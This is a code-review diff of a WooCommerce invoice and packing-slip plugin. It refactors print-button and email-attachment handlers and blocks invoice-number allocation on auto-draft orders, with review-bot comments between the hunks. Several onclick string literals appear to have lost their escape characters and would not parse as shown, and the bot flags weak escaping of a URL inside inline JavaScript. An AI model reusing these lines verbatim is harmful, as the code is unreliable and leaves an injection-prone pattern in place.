-	public function add_email_attachments($attachments, $status = null, $order = null, $email = null)
-	{
-		if ( is_object( $order) && is_a( $order, 'WC_Order' ) ) {
-			$order = ( version_compare( WC()->version, '2.7.0', '<' ) ) ? new WC_Order($order) : new wf_order($order);
-			$order_id = version_compare( WC()->version, '2.7.0', '<' ) ? $order->id : $order->get_id();
+	public function add_email_attachments( $attachments, $status = null, $order = null, $email = null ) {
+		if ( is_object( $order ) && is_a( $order, 'WC_Order' ) ) {
+			$order_id = $order->get_id();
 		} else {
-		   /**
-			* 4.7.3
-			* - `wt_get_order_id_from_email_obj`:
-			*   Filter to retrieve the order ID from the email object when the order is not directly available.
-			*
-			*   @param int|null $order_id The current order ID, defaults to null.
-			*   @param object|null $email The email object passed to the filter, may contain order-related data.
-			*   @param string|null $status The email status or id.
-			*/
-			$order_id = apply_filters('wt_get_order_id_from_email_obj', null, $email, $status, $order);
-			$order = wc_get_order($order_id);
+			/**
+			 * 4.7.3
+			 * - `wt_get_order_id_from_email_obj`:
+			 *   Filter to retrieve the order ID from the email object when the order is not directly available.
+			 *
+			 *   @param int|null $order_id The current order ID, defaults to null.
+			 *   @param object|null $email The email object passed to the filter, may contain order-related data.
+			 *   @param string|null $status The email status or id.
+			 */
+			$order_id = apply_filters( 'wt_get_order_id_from_email_obj', null, $email, $status, $order );
+			$order    = wc_get_order( $order_id );
 		}
-
+
 		if ( is_object( $order ) && is_a( $order, 'WC_Order' ) && isset( $status ) ) {
-			$attachments = apply_filters('wt_email_attachments', $attachments, $order, $order_id, $status);
+			$attachments = apply_filters( 'wt_email_attachments', $attachments, $order, $order_id, $status );
 		}
-
+
 		return $attachments;
 	}
-
-    /**
+
+	/**
 	 * Function to add action buttons in order email
 	 *
-	 * 	@since    2.5.0
-	 *	@since 	  2.6.5 	[Bug fix] Print button missing in email
+	 *  @since    2.5.0
+	 *  @since    2.6.5     [Bug fix] Print button missing in email
 	 */
-	public function add_email_print_actions($order)
-	{
-		if(is_object($order) && is_a($order,'WC_Order'))
-		{
-			$order=( version_compare( WC()->version, '2.7.0', '<' ) ) ? new WC_Order($order) : new wf_order($order);
-			$order_id = version_compare( WC()->version, '2.7.0', '<' ) ? $order->id : $order->get_id();
-			$html='';
-			$html=apply_filters('wt_email_print_actions',$html,$order,$order_id);
+	public function add_email_print_actions( $order ) {
+		if ( is_object( $order ) && is_a( $order, 'WC_Order' ) ) {
+			$order_id = $order->get_id();
+			$html     = '';
+			$html     = apply_filters( 'wt_email_print_actions', $html, $order, $order_id );
 		}
 	}

-    /**
+	/**
 	 * Function to add action buttons in user dashboard order list page
 	 *
 	 * @since    2.5.0
 	 */
-	public function add_fontend_print_actions($order)
-	{
-		$order=( version_compare( WC()->version, '2.7.0', '<' ) ) ? new WC_Order($order) : new wf_order($order);
-		$order_id = version_compare( WC()->version, '2.7.0', '<' ) ? $order->id : $order->get_id();
-		$html='';
-		$html=apply_filters('wt_frontend_print_actions',$html,$order,$order_id);
-	}
-
-	public function add_order_list_page_print_actions($actions, $order)
-	{
-		$order=( version_compare( WC()->version, '2.7.0', '<' ) ) ? new WC_Order($order) : new wf_order($order);
-		$order_id = version_compare( WC()->version, '2.7.0', '<' ) ? $order->id : $order->get_id();
-
-		$wt_actions=array();
-		$wt_actions=apply_filters('wt_pklist_intl_frontend_order_list_page_print_actions', $wt_actions, $order, $order_id);
-		if(is_array($wt_actions) && count($wt_actions)>0)
-		{
-			foreach($wt_actions as $template_type => $action_arr)
-			{
-				if(is_array($action_arr))
-				{
-					foreach ($action_arr as $action => $title)
-					{
-						$show_button=true;
-						$show_button=apply_filters('wt_pklist_is_frontend_order_list_page_print_action', $show_button, $template_type, $action);
-						if($show_button)
-						{
+	public function add_fontend_print_actions( $order ) {
+		if ( ! is_object( $order ) || ! is_a( $order, 'WC_Order' ) ) {
+			return;
+		}
+		$order_id = $order->get_id();
+		$html     = '';
+		$html     = apply_filters( 'wt_frontend_print_actions', $html, $order, $order_id );
+	}
+
+	public function add_order_list_page_print_actions( $actions, $order ) {
+		if ( ! is_object( $order ) || ! is_a( $order, 'WC_Order' ) ) {
+			return $actions;
+		}
+		$order_id = $order->get_id();
+
+		$wt_actions = array();
+		$wt_actions = apply_filters( 'wt_pklist_intl_frontend_order_list_page_print_actions', $wt_actions, $order, $order_id );
+		if ( is_array( $wt_actions ) && count( $wt_actions ) > 0 ) {
+			foreach ( $wt_actions as $template_type => $action_arr ) {
+				if ( is_array( $action_arr ) ) {
+					foreach ( $action_arr as $action => $title ) {
+						$show_button = true;
+						$show_button = apply_filters( 'wt_pklist_is_frontend_order_list_page_print_action', $show_button, $template_type, $action );
+						if ( $show_button ) {
 							/** button info to WC hook */
-							$action_data=array(
-								'url'  => Wf_Woocommerce_Packing_List::generate_print_url_for_user($order, $order_id, $template_type, $action),
+							$action_data = array(
+								'url'  => Wf_Woocommerce_Packing_List::generate_print_url_for_user( $order, $order_id, $template_type, $action ),
 								'name' => $title,
 							);
-							$actions['wt_pklist_'.$template_type.'_'.$action]=apply_filters('wt_pklist_frontend_order_list_page_print_action', $action_data, $template_type, $action, $order, $order_id);
+							$actions[ 'wt_pklist_' . $template_type . '_' . $action ] = apply_filters( 'wt_pklist_frontend_order_list_page_print_action', $action_data, $template_type, $action, $order, $order_id );
 						}
 					}
 				}
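Review bot: `add_email_print_actions()` and `add_fontend_print_actions()` still assign the result of `apply_filters()` to `$html` and then drop it, so nothing is echoed or returned and any visible output depends on callbacks printing as a side effect. Either output the value through an escaper such as `wp_kses_post( $html )` or switch these two hooks to `do_action()` so the intent is explicit. In the tail of the attachment handler, `$order_id` is passed to `wt_email_attachments` but, in the lines shown, is assigned only inside the fallback block that resolves the order from the email object; confirm it is initialised on the path where `$order` is already a `WC_Order`. The new `is_a( $order, 'WC_Order' )` guards also replace the old `wf_order` wrapper, which changes the object type that callbacks on `wt_frontend_print_actions` and `wt_pklist_intl_frontend_order_list_page_print_actions` receive; that deserves a changelog line.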
@@ -492,74 +476,104 @@
 		return $actions;
 	}

-	public static function get_print_url($order_id, $action)
-	{
-		$url=wp_nonce_url(admin_url('?print_packinglist=true&post='.($order_id).'&type='.$action), WF_PKLIST_PLUGIN_NAME);
-		$nonce = isset($_GET['_wpnonce']) ? sanitize_text_field(wp_unslash($_GET['_wpnonce'])) : ''; // phpcs:ignore WordPress.Security.NonceVerification.Recommended,WordPress.Security.ValidatedSanitizedInput.MissingUnslash,WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
-		$url=(isset($_GET['debug']) && wp_verify_nonce($nonce, 'debug_mode')) ? $url.'&debug' : $url;
+	/**
+	 * Whether the order has never been saved (still an auto-draft from "Add new order").
+	 * Used to block invoice number generation on orders the admin may abandon.
+	 *
+	 * @param WC_Order|object $order
+	 * @return bool
+	 */
+	public static function is_order_unsaved( $order ) {
+		if ( ! is_object( $order ) || ! method_exists( $order, 'get_status' ) ) {
+			return false;
+		}
+		return 'auto-draft' === $order->get_status();
+	}
+
+	/**
+	 * Whether the given print/download action allocates a sequence number on
+	 * generation. Only invoice and proforma-invoice flows do — those are the
+	 * ones that must be blocked on auto-draft orders.
+	 *
+	 * @param string $action Action key from $_GET['type'] (e.g. 'print_invoice').
+	 * @return bool
+	 */
+	public static function action_burns_invoice_number( $action ) {
+		$invoice_actions = array(
+			'print_invoice',
+			'download_invoice',
+			'print_proformainvoice',
+			'download_proformainvoice',
+			'print_dispatchlabel',
+			'download_dispatchlabel',
+		);
+		return in_array( $action, $invoice_actions, true );
+	}
+
+	public static function get_print_url( $order_id, $action ) {
+		$url   = wp_nonce_url( admin_url( '?print_packinglist=true&post=' . ( $order_id ) . '&type=' . $action ), WF_PKLIST_PLUGIN_NAME );
+		$nonce = isset( $_GET['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_GET['_wpnonce'] ) ) : ''; // phpcs:ignore WordPress.Security.NonceVerification.Recommended,WordPress.Security.ValidatedSanitizedInput.MissingUnslash,WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
+		$url   = ( isset( $_GET['debug'] ) && wp_verify_nonce( $nonce, 'debug_mode' ) ) ? $url . '&debug' : $url;
 		return $url;
 	}

-	public static function generate_print_button_data($order,$order_id,$action,$label,$icon_url,$is_show_prompt,$button_location="detail_page")
-	{
-		$url=self::get_print_url($order_id, $action);
-
-		$href_attr='';
-		$onclick='';
-		$confirmation_clss='';
-		if(false === Wf_Woocommerce_Packing_List::is_from_address_available())
-    	{
-    		$is_show_prompt = 3;
-    	}
-		if((1 === $is_show_prompt || "1" === $is_show_prompt) || (2 === $is_show_prompt || "2" === $is_show_prompt) || (3 === $is_show_prompt || "3" === $is_show_prompt))
-		{
-			$confirmation_clss='wf_pklist_confirm_'.$action;
-			$onclick='onclick=" return wf_Confirm_Notice_for_Manually_Creating_Invoicenumbers(''.$url.'','.$is_show_prompt.');"';
-		}else
-		{
-			$href_attr=' href="'.esc_url($url).'"';
-		}
-		if("detail_page" === $button_location)
-        {
-        ?>
+	public static function generate_print_button_data( $order, $order_id, $action, $label, $icon_url, $is_show_prompt, $button_location = 'detail_page' ) {
+		$url = self::get_print_url( $order_id, $action );
+
+		$href_attr         = '';
+		$onclick           = '';
+		$confirmation_clss = '';
+		// Only invoice / proforma invoice burn a number on auto-draft orders.
+		// Dispatch label / packing slip / etc. also pass is_show_prompt = 1 in
+		// their own context, so gate by action name instead.
+		if ( self::is_order_unsaved( $order ) && self::action_burns_invoice_number( $action ) ) {
+			$is_show_prompt = 99;
+		} elseif ( false === Wf_Woocommerce_Packing_List::is_from_address_available() ) {
+			$is_show_prompt = 3;
+		}
+		if ( ( 1 === $is_show_prompt || '1' === $is_show_prompt ) || ( 2 === $is_show_prompt || '2' === $is_show_prompt ) || ( 3 === $is_show_prompt || '3' === $is_show_prompt ) || ( 99 === $is_show_prompt || '99' === $is_show_prompt ) ) {
+			$confirmation_clss = 'wf_pklist_confirm_' . $action;
+			$onclick           = 'onclick=" return wf_Confirm_Notice_for_Manually_Creating_Invoicenumbers('' . $url . '',' . $is_show_prompt . ');"';
+		} else {
+			$href_attr = ' href="' . esc_url( $url ) . '"';
+		}
+		if ( 'detail_page' === $button_location ) {
+			?>
 		<tr>
 			<td>
-				<a class="button tips wf-packing-list-link" <?php echo wp_kses_post($onclick);?> <?php echo wp_kses_post($href_attr);?> target="_blank" data-tip="<?php echo esc_attr(wp_strip_all_tags($label));?>" >
-				<?php
-				if("" !== $icon_url)
-				{
-				?>
-					<img src="<?php echo esc_url($icon_url);?>" alt="<?php echo esc_attr($label);?>" width="14">
+				<a class="button tips wf-packing-list-link" <?php echo wp_kses_post( $onclick ); ?> <?php echo wp_kses_post( $href_attr ); ?> target="_blank" data-tip="<?php echo esc_attr( wp_strip_all_tags( $label ) ); ?>" >
 				<?php
+				if ( '' !== $icon_url ) {
+					?>
+					<img src="<?php echo esc_url( $icon_url ); ?>" alt="<?php echo esc_attr( $label ); ?>" width="14">
+					<?php
 				}
 				?>
-				<?php echo wp_kses_post($label);?>
+				<?php echo wp_kses_post( $label ); ?>
 				</a>
 			</td>
 		</tr>
-		<?php
-        }elseif("list_page" === $button_location)
-        {
-        ?>
+			<?php
+		} elseif ( 'list_page' === $button_location ) {
+			?>
 			<li>
-				<a class="<?php echo esc_attr($confirmation_clss);?>" data-id="<?php echo esc_attr($order_id);?>" <?php echo wp_kses_post($onclick);?> <?php echo wp_kses_post($href_attr);?> target="_blank"><?php echo wp_kses_post($label);?></a>
+				<a class="<?php echo esc_attr( $confirmation_clss ); ?>" data-id="<?php echo esc_attr( $order_id ); ?>" <?php echo wp_kses_post( $onclick ); ?> <?php echo wp_kses_post( $href_attr ); ?> target="_blank"><?php echo wp_kses_post( $label ); ?></a>
 			</li>
-		<?php
-        }
+			<?php
+		}
 	}
-
+
 	/**
 	 * Registers meta box and printing options
 	 *
 	 * @since 2.5.0
 	 * @since 4.1.3 - Add - Debug meta box in order edit page - admin dashboard
 	 */
-	public function add_meta_boxes()
-	{
+	public function add_meta_boxes() {
 		$order_details_screen = Wt_Pklist_Common::is_wc_hpos_enabled() ? wc_get_page_screen_id( 'shop-order' ) : 'shop_order';
-		add_meta_box('woocommerce-packinglist-box', __('Invoice/Packing','print-invoices-packing-slip-labels-for-woocommerce'), array($this,'create_metabox_content'),$order_details_screen, 'side', 'default');
-		if(isset($_GET['wt-pklist-debug'])){ // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- This is a safe use of isset.
-			add_meta_box('woocommerce-packinglist-box-debug', __('WT PDF Invoice Debug','print-invoices-packing-slip-labels-for-woocommerce'), array($this,'wt_pklist_debug_metabox_content'),$order_details_screen, 'normal', 'default');
+		add_meta_box( 'woocommerce-packinglist-box', __( 'Invoice/Packing', 'print-invoices-packing-slip-labels-for-woocommerce' ), array( $this, 'create_metabox_content' ), $order_details_screen, 'side', 'default' );
+		if ( isset( $_GET['wt-pklist-debug'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Recommended -- This is a safe use of isset.
+			add_meta_box( 'woocommerce-packinglist-box-debug', __( 'WT PDF Invoice Debug', 'print-invoices-packing-slip-labels-for-woocommerce' ), array( $this, 'wt_pklist_debug_metabox_content' ), $order_details_screen, 'normal', 'default' );
 		}
 	}

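Review bot: `action_burns_invoice_number()` documents that only invoice and proforma-invoice actions allocate a number, yet `$invoice_actions` also lists `print_dispatchlabel` and `download_dispatchlabel`, and the comment in `generate_print_button_data()` names dispatch labels as a case that should not be gated. Either drop the two dispatch-label entries or correct both comments so the list and its stated contract agree. The prompt value `99` is a magic number repeated in the long condition; a class constant would make that comparison easier to audit. In the same function `$url` is concatenated into the inline `onclick` JavaScript string and printed through `wp_kses_post()`, which is an HTML content filter rather than an attribute or JavaScript escaper; `esc_js()` on the URL and `esc_attr()` on the attribute value would match the `esc_url()` already applied to `$href_attr`.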
@@ -568,297 +582,271 @@
 	 *
 	 * @param array $links links array
 	 */
-	public function plugin_action_links($links)
-	{
-	   	$links[] = '<a href="'.admin_url('admin.php?page='.WF_PKLIST_POST_TYPE).'">'.__('Settings', 'print-invoices-packing-slip-labels-for-woocommerce').'</a>';
-	   	$links[] = '<a href="https://wordpress.org/support/plugin/print-invoices-packing-slip-labels-for-woocommerce/#new-topic-0" target="_blank">'.__('Support','print-invoices-packing-slip-labels-for-woocommerce').'</a>';
-	   	$links[] = '<a href="https://wordpress.org/support/plugin/print-invoices-packing-slip-labels-for-woocommerce/reviews/?rate=5#new-post" target="_blank">' . __('Review','print-invoices-packing-slip-labels-for-woocommerce') . '</a>';
-	   	$links[] = '<a href="https://www.webtoffee.com/woocommerce-pdf-invoices-packing-slips-delivery-notes-shipping-labels-userguide-free-version/" target="_blank">' . __('Documentation','print-invoices-packing-slip-labels-for-woocommerce') . '</a>';
-	   	$not_activated_pro_addons = Wf_Woocommerce_Packing_List_Admin::not_activated_pro_addons('wt_qr_addon');
-	   	if(!empty($not_activated_pro_addons)){
-	   		$pro_addon_arr = array(
-		   		'wt_ipc_addon' => array(
-		   				'utm_link' => 'https://www.webtoffee.com/product/woocommerce-pdf-invoices-packing-slips/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=PDF_invoice&utm_content='.WF_PKLIST_VERSION,
-		   				'link_label' => __('PDF Invoices','print-invoices-packing-slip-labels-for-woocommerce'),
-		   			),
-		   		'wt_sdd_addon' => array(
-		   				'utm_link' => 'https://www.webtoffee.com/product/woocommerce-shipping-labels-delivery-notes/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=Shipping_Label&utm_content='.WF_PKLIST_VERSION,
-		   				'link_label' => __('Shipping labels','print-invoices-packing-slip-labels-for-woocommerce'),
-		   			),
-		   		'wt_pl_addon' => array(
-		   				'utm_link' => 'https://www.webtoffee.com/product/woocommerce-picklist/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=Picklist&utm_content='.WF_PKLIST_VERSION,
-		   				'link_label' => __('Pick lists','print-invoices-packing-slip-labels-for-woocommerce'),
-		   			),
-		   		'wt_pi_addon' => array(
-		   				'utm_link' => 'https://www.webtoffee.com/product/woocommerce-proforma-invoice/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=Proforma_Invoice&utm_content='.WF_PKLIST_VERSION,
-		   				'link_label' => __('Proforma invoices','print-invoices-packing-slip-labels-for-woocommerce'),
-		   			),
-		   		'wt_al_addon' => array(
-		   				'utm_link' => 'https://www.webtoffee.com/product/woocommerce-address-label/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=Address_Label&utm_content='.WF_PKLIST_VERSION,
-		   				'link_label' => __('Address labels','print-invoices-packing-slip-labels-for-woocommerce'),
-		   			),
-		   	);
-	   		$addon_link = '<br><span style="color:#3db634;">'.__("Premium Extensions","print-invoices-packing-slip-labels-for-woocommerce").': </span>';
-		   	for($i = 0; $i < count($not_activated_pro_addons); $i++){
-		   		if(isset($pro_addon_arr[$not_activated_pro_addons[$i]])){
-		   			$pro_add = $pro_addon_arr[$not_activated_pro_addons[$i]];
-		   			$addon_link .= '<a href="'.esc_url($pro_add['utm_link']).'" target="_blank">'.esc_html($pro_add['link_label']).'</a>';
-		   			if($i < count($not_activated_pro_addons)-1){
-		   				$addon_link .=' | ';
-		   			}
-		   		}
-		   	}
-	   		$links[] = $addon_link;
-	   	}
-	   	return $links;
+	public function plugin_action_links( $links ) {
+		$links[]                  = '<a href="' . admin_url( 'admin.php?page=' . WF_PKLIST_POST_TYPE ) . '">' . __( 'Settings', 'print-invoices-packing-slip-labels-for-woocommerce' ) . '</a>';
+		$links[]                  = '<a href="https://wordpress.org/support/plugin/print-invoices-packing-slip-labels-for-woocommerce/#new-topic-0" target="_blank">' . __( 'Support', 'print-invoices-packing-slip-labels-for-woocommerce' ) . '</a>';
+		$links[]                  = '<a href="https://wordpress.org/support/plugin/print-invoices-packing-slip-labels-for-woocommerce/reviews/?rate=5#new-post" target="_blank">' . __( 'Review', 'print-invoices-packing-slip-labels-for-woocommerce' ) . '</a>';
+		$links[]                  = '<a href="https://www.webtoffee.com/woocommerce-pdf-invoices-packing-slips-delivery-notes-shipping-labels-userguide-free-version/" target="_blank">' . __( 'Documentation', 'print-invoices-packing-slip-labels-for-woocommerce' ) . '</a>';
+		$not_activated_pro_addons = self::not_activated_pro_addons( 'wt_qr_addon' );
+		if ( ! empty( $not_activated_pro_addons ) ) {
+			$pro_addon_arr = array(
+				'wt_ipc_addon' => array(
+					'utm_link'   => 'https://www.webtoffee.com/product/woocommerce-pdf-invoices-packing-slips/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=PDF_invoice&utm_content=' . WF_PKLIST_VERSION,
+					'link_label' => __( 'PDF Invoices', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				),
+				'wt_sdd_addon' => array(
+					'utm_link'   => 'https://www.webtoffee.com/product/woocommerce-shipping-labels-delivery-notes/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=Shipping_Label&utm_content=' . WF_PKLIST_VERSION,
+					'link_label' => __( 'Shipping labels', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				),
+				'wt_pl_addon'  => array(
+					'utm_link'   => 'https://www.webtoffee.com/product/woocommerce-picklist/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=Picklist&utm_content=' . WF_PKLIST_VERSION,
+					'link_label' => __( 'Pick lists', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				),
+				'wt_pi_addon'  => array(
+					'utm_link'   => 'https://www.webtoffee.com/product/woocommerce-proforma-invoice/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=Proforma_Invoice&utm_content=' . WF_PKLIST_VERSION,
+					'link_label' => __( 'Proforma invoices', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				),
+				'wt_al_addon'  => array(
+					'utm_link'   => 'https://www.webtoffee.com/product/woocommerce-address-label/?utm_source=free_plugin_listing&utm_medium=pdf_basic&utm_campaign=Address_Label&utm_content=' . WF_PKLIST_VERSION,
+					'link_label' => __( 'Address labels', 'print-invoices-packing-slip-labels-for-woocommerce' ),
+				),
+			);
+			$addon_link    = '<br><span style="color:#3db634;">' . __( 'Premium Extensions', 'print-invoices-packing-slip-labels-for-woocommerce' ) . ': </span>';
+			for ( $i = 0; $i < count( $not_activated_pro_addons ); $i++ ) {
+				if ( isset( $pro_addon_arr[ $not_activated_pro_addons[ $i ] ] ) ) {
+					$pro_add     = $pro_addon_arr[ $not_activated_pro_addons[ $i ] ];
+					$addon_link .= '<a href="' . esc_url( $pro_add['utm_link'] ) . '" target="_blank">' . esc_html( $pro_add['link_label'] ) . '</a>';
+					if ( $i < count( $not_activated_pro_addons ) - 1 ) {
+						$addon_link .= ' | ';
+					}
+				}
+			}
+			$links[] = $addon_link;
+		}
+		return $links;
 	}

 	/**
-	 *	@since  4.0.0
-	 * 	- create content for metabox
-	 *	- added separate section for document details and print actions
-	 *
+	 *  @since  4.0.0
+	 *  - create content for metabox
+	 *  - added separate section for document details and print actions
 	 */
-	public function create_metabox_content($post_or_order_object)
-	{
+	public function create_metabox_content( $post_or_order_object ) {
 		$order = ( $post_or_order_object instanceof WP_Post ) ? wc_get_order( $post_or_order_object->ID ) : $post_or_order_object;
 		if ( ! is_object( $order ) && is_numeric( $order ) ) {
 			$order = wc_get_order( absint( $order ) );
 		}
-		$order_id = version_compare( WC()->version, '2.7.0', '<' ) ? $order->id : $order->get_id();
+		$order_id = $order->get_id();
 		?>
-		<table class="wf_invoice_metabox" style="width:100%;">
+		<table class="wf_invoice_metabox" style="width:100%;">
 			<?php
-			$data_arr=array();
-			$data_arr=apply_filters('wt_print_docdata_metabox',$data_arr, $order, $order_id);
-			if(count($data_arr)>0)
-			{
-			?>
+			$data_arr = array();
+			$data_arr = apply_filters( 'wt_print_docdata_metabox', $data_arr, $order, $order_id );
+			if ( count( $data_arr ) > 0 ) {
+				?>
 			<tr>
 				<td style="font-weight:bold;">
-					<h4 style="margin:0px; padding-top:5px; padding-bottom:3px; border-bottom:dashed 1px #ccc;"><?php esc_html_e('Document details','print-invoices-packing-slip-labels-for-woocommerce'); ?></h4>
+					<h4 style="margin:0px; padding-top:5px; padding-bottom:3px; border-bottom:dashed 1px #ccc;"><?php esc_html_e( 'Document details', 'print-invoices-packing-slip-labels-for-woocommerce' ); ?></h4>
 				</td>
 			</tr>
 			<tr>
 				<td style="padding-bottom:10px;">
 					<?php
-
-					foreach($data_arr as $datav)
-					{
+
+					foreach ( $data_arr as $datav ) {
 						echo '<span style="font-weight:500;">';
-						echo ("" !== $datav['label'] ? esc_html($datav['label']).': ' : '');
+						echo ( '' !== $datav['label'] ? esc_html( $datav['label'] ) . ': ' : '' );
 						echo '</span>';
-						echo esc_html($datav['value']).'<br />';
+						echo esc_html( $datav['value'] ) . '<br />';
 					}
 					?>
 				</td>
 			</tr>
-			<?php
+				<?php
 			}
 			?>
 			<tr>
 				<td>
-					<h4 style="margin:0px; padding-top:5px; padding-bottom:3px; border-bottom:dashed 1px #ccc;"><?php esc_html_e('Print/Download','print-invoices-packing-slip-labels-for-woocommerce'); ?></h4>
+					<h4 style="margin:0px; padding-top:5px; padding-bottom:3px; border-bottom:dashed 1px #ccc;"><?php esc_html_e( 'Print/Download', 'print-invoices-packing-slip-labels-for-woocommerce' ); ?></h4>
 				</td>
 			</tr>
 			<tr>
 				<td style="height:3px; font-size:0px; line-height:0px;"></td>
 			</tr>
 			<?php
-			$btn_arr=array();
-			$btn_arr=apply_filters('wt_print_actions', $btn_arr, $order, $order_id, 'detail_page');
-			self::generate_print_button_html($btn_arr, $order, $order_id, 'detail_page'); //generate buttons
+			$btn_arr = array();
+			$btn_arr = apply_filters( 'wt_print_actions', $btn_arr, $order, $order_id, 'detail_page' );
+			self::generate_print_button_html( $btn_arr, $order, $order_id, 'detail_page' ); // generate buttons
 			?>
 		</table>
 		<?php
 	}

-	public static function generate_print_button_html($btn_arr, $order, $order_id, $button_location)
-	{
+	public static function generate_print_button_html( $btn_arr, $order, $order_id, $button_location ) {
 		/* filter for customers to alter buttons */
-		$btn_arr=apply_filters('wt_pklist_alter_print_actions',$btn_arr, $order, $order_id, $button_location);
-
+		$btn_arr = apply_filters( 'wt_pklist_alter_print_actions', $btn_arr, $order, $order_id, $button_location );
+
 		// Start output buffering only for list_page (which expects return value)
-		if ('list_page' === $button_location) {
+		if ( 'list_page' === $button_location ) {
 			ob_start();
 		}
-
-		foreach($btn_arr as $btn_key=>$args)
-		{
-			$action=$args['action'];
-			if("print_invoice" === $action || 'print_packinglist' === $action){
+
+		foreach ( $btn_arr as $btn_key => $args ) {
+			$action = $args['action'];
+			if ( 'print_invoice' === $action || 'print_packinglist' === $action ) {
 				continue;
 			}
-			$css_class=(isset($args['css_class']) && is_string($args['css_class']) ? $args['css_class'] : ''); /* button custom css */
-			$custom_attr=(isset($args['custom_attr']) && is_string($args['custom_attr']) ? $args['custom_attr'] : ''); /* button custom attribute */
+			$css_class   = ( isset( $args['css_class'] ) && is_string( $args['css_class'] ) ? $args['css_class'] : '' ); /* button custom css */
+			$custom_attr = ( isset( $args['custom_attr'] ) && is_string( $args['custom_attr'] ) ? $args['custom_attr'] : '' ); /* button custom attribute */

-			$label=$args['label'];
-			$is_show_prompt=$args['is_show_prompt'];
-			$tooltip=(isset($args['tooltip']) ? $args['tooltip'] : $label);
-			$button_location=(isset($args['button_location']) ? $args['button_location'] : 'detail_page');
-
-			$url=self::get_print_url($order_id, $action);
-
-			$href_attr='';
-			$onclick='';
-			$confirmation_clss='';
-			if(0 !== $is_show_prompt && "0" !== $is_show_prompt) //$is_show_prompt variable is a string then it will set as warning msg title
-			{
-				$confirmation_clss='wf_pklist_confirm_'.$action;
-				$onclick='onclick=" return wf_Confirm_Notice_for_Manually_Creating_Invoicenumbers(''.$url.'',''.$is_show_prompt.'');"';
-			}else
-			{
-				$href_attr=' href="'.$url.'"';
-			}
-			if("detail_page" === $button_location)
-	        {
-	        	$button_type=(isset($args['button_type']) ? $args['button_type'] : 'normal');
-	        	$button_key=(isset($args['button_key']) ? $args['button_key'] : 'button_key_'.$btn_key);
-				$doc_exist = (isset($args['exist']) ? $args['exist'] : false);
-				$icon_class = false === $doc_exist ? 'wt_doc_not_exist' : '';
-	        ?>
+			$label           = $args['label'];
+			$is_show_prompt  = $args['is_show_prompt'];
+			$tooltip         = ( isset( $args['tooltip'] ) ? $args['tooltip'] : $label );
+			$button_location = ( isset( $args['button_location'] ) ? $args['button_location'] : 'detail_page' );
+
+			// Only invoice / proforma actions burn a sequence number on auto-draft.
+			if ( self::is_order_unsaved( $order ) && self::action_burns_invoice_number( $action ) ) {
+				$is_show_prompt = 99;
+			}
+
+			$url = self::get_print_url( $order_id, $action );
+
+			$href_attr         = '';
+			$onclick           = '';
+			$confirmation_clss = '';
+			if ( 0 !== $is_show_prompt && '0' !== $is_show_prompt ) {
+				$confirmation_clss = 'wf_pklist_confirm_' . $action;
+				$onclick           = 'onclick=" return wf_Confirm_Notice_for_Manually_Creating_Invoicenumbers('' . $url . '','' . $is_show_prompt . '');"';
+			} else {
+				$href_attr = ' href="' . $url . '"';
+			}
+			if ( 'detail_page' === $button_location ) {
+				$button_type = ( isset( $args['button_type'] ) ? $args['button_type'] : 'normal' );
+				$button_key  = ( isset( $args['button_key'] ) ? $args['button_key'] : 'button_key_' . $btn_key );
+				$doc_exist   = ( isset( $args['exist'] ) ? $args['exist'] : false );
+				$icon_class  = false === $doc_exist ? 'wt_doc_not_exist' : '';
+				?>
 				<tr>
 					<td class="wt_pklist_dash_btn_row">
 						<?php
-						if("aggregate" === $button_type || "dropdown" === $button_type)
-						{
-							if("aggregate" === $button_type) /* reverse the order of buttons */
-							{
-								$args['items']=array_reverse($args['items']);
+						if ( 'aggregate' === $button_type || 'dropdown' === $button_type ) {
+							if ( 'aggregate' === $button_type ) {
+								$args['items'] = array_reverse( $args['items'] );
 							}
 							?>
-							<div class="wt_pklist_<?php echo esc_attr($button_type);?> <?php echo esc_attr($css_class);?>" <?php echo wp_kses_post($custom_attr);?> >
-								<div class="wt_pklist_btn_text"><?php echo wp_kses_post($label);?></div>
-								<div class="wt_pklist_<?php echo esc_attr($button_type);?>_content">
+							<div class="wt_pklist_<?php echo esc_attr( $button_type ); ?> <?php echo esc_attr( $css_class ); ?>" <?php echo wp_kses_post( $custom_attr ); ?> >
+								<div class="wt_pklist_btn_text"><?php echo wp_kses_post( $label ); ?></div>
+								<div class="wt_pklist_<?php echo esc_attr( $button_type ); ?>_content">
 									<?php
-									foreach($args['items'] as $btnkk => $btnvv)
-									{
-										$action=$btnvv['action'];
-										$label=$btnvv['label'];
-
-										$icon=(isset($btnvv['icon']) && "" !== $btnvv['icon'] ? $btnvv['icon'] : ''); //dashicon
-										$icon_url=(isset($btnvv['icon_url']) && "" !== $btnvv['icon_url'] ? $btnvv['icon_url'] : ''); //image icon
-
-										if("aggregate" === $button_type) /* only icon, No label */
-										{
-											if("" === $icon && "" === $icon_url)
-											{
+									foreach ( $args['items'] as $btnkk => $btnvv ) {
+										$action = $btnvv['action'];
+										$label  = $btnvv['label'];
+
+										$icon     = ( isset( $btnvv['icon'] ) && '' !== $btnvv['icon'] ? $btnvv['icon'] : '' ); // dashicon
+										$icon_url = ( isset( $btnvv['icon_url'] ) && '' !== $btnvv['icon_url'] ? $btnvv['icon_url'] : '' ); // image icon
+
+										if ( 'aggregate' === $button_type ) {
+											if ( '' === $icon && '' === $icon_url ) {
 												global $wp_version;
-												if(version_compare($wp_version, '5.5.3')>=0)
-												{
-													$fallback_icon='tag';
-													if(false !== strpos($action, 'download_'))
-													{
-														$fallback_icon='download';
-
-													}elseif(false !== strpos($action, 'print_'))
-													{
